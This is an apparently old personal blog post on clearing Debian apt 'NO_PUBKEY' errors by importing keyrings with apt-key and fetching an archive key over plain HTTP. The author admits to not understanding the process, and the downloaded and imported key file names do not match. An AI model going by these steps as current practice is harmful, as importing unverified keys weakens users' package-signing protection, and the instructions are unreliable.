apt-get install debian-keyring

Now we can import the key using apt-key.


apt-key add /usr/share/keyrings/debian-keyring.gpg
apt-key add /usr/share/keyrings/debian-role-keys.gpg


Now I am really not sure what the difference is between them.
This fixed my message of NO_PUBKEY for ftp.nerim.net
If you don't have this in your sources.list and its a desktop. I really would add this, alot of video and media type debs that debian does not carry. Link below:
http://debian.video.free.fr

Ok, back to buisness. apt is still complaining about my kernel.org mirror.
I read somewhere that a new key will added every year on the year. Somehow I did not have that new key from the debian-keyring package. So lets go get it.


wget http://ftp-master.debian.org/ziyi_key_year.asc


Now I just added it with apt-key but you could just do it with gpg.


gpg --import ziyi_key_2006.asc

or

apt-key add ziyi_key_2006.asc



Now apt-get update and it should be fixed. Like I said earlier, I'm a little unclear about this whole process. I would have thought downloading the whole debian-keyring would have done it. It is even over kill becuase I really only needed a couple of keys.

Links:
http://www.debian-administration.org/articles/174
http://secure-testing-master.debian.net/
http://lists.debian.org/debian-user/2005/11/msg00064.html
http://moonbase.rydia.net/mental/blog/life/mixing-ubuntu-and-debian.html